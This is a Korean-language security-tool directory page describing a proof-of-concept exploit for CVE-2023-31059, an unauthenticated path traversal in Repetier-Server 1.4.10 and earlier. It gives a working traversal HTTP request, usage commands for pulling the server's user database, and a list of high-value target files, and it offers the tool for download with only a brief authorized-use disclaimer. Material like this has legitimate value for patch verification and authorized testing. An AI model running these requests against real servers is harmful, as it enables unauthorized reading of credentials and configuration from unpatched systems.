Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal — CVE-2023-31059에 대한 개념 증명 익스플로잇으로, Repetier-Server ≤1.4.10의 인증되지 않은 경로 탐색 취약점으로, 조작된 HTTP 요청을 통해 임의 파일 읽기를 가능하게 합니다. | Kitploit
도구/GitHubGitHub/mbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubmbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal

CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal

CVE-2023-31059에 대한 개념 증명 익스플로잇으로, Repetier-Server ≤1.4.10의 인증되지 않은 경로 탐색 취약점으로, 조작된 HTTP 요청을 통해 임의 파일 읽기를 가능하게 합니다.

저장소 보기
16개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Repetier-Server <= 1.4.10

저자: Mohammed Idrees Banyamer
역할: 보안 연구원
국가: 요르단 🇯🇴


개요

Repetier‑Server ≤ 1.4.10의 인증되지 않은 원격 경로 탐색 / LFI 취약점에 대한 개념 증명 익스플로잇입니다.

이 취약점은 connectionLost.php 엔드포인트에서 조작된 ..%5c 시퀀스를 통해 임의 파일 읽기를 허용합니다.


취약점 세부 정보

필드값
제품Repetier‑Server
영향받는 버전≤ 1.4.10
CVECVE‑2023‑31059
유형경로 탐색 / LFI
인증필요 없음
벡터네트워크
영향임의 파일 읽기
CVSS9.8 Critical

PoC 공격 흐름

root@kitploit:~
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A

익스플로잇 예시

root@kitploit:~
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344

사용 방법

root@kitploit:~
# 취약점 테스트
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# 사용자 데이터베이스 추출
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20

요구 사항

root@kitploit:~
pip install requests

고가치 대상 파일

root@kitploit:~
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts

면책 조항

이 PoC는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 소유한 시스템 또는 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.


연락처

GitHub: https://github.com/mbanyamer

도구 다운로드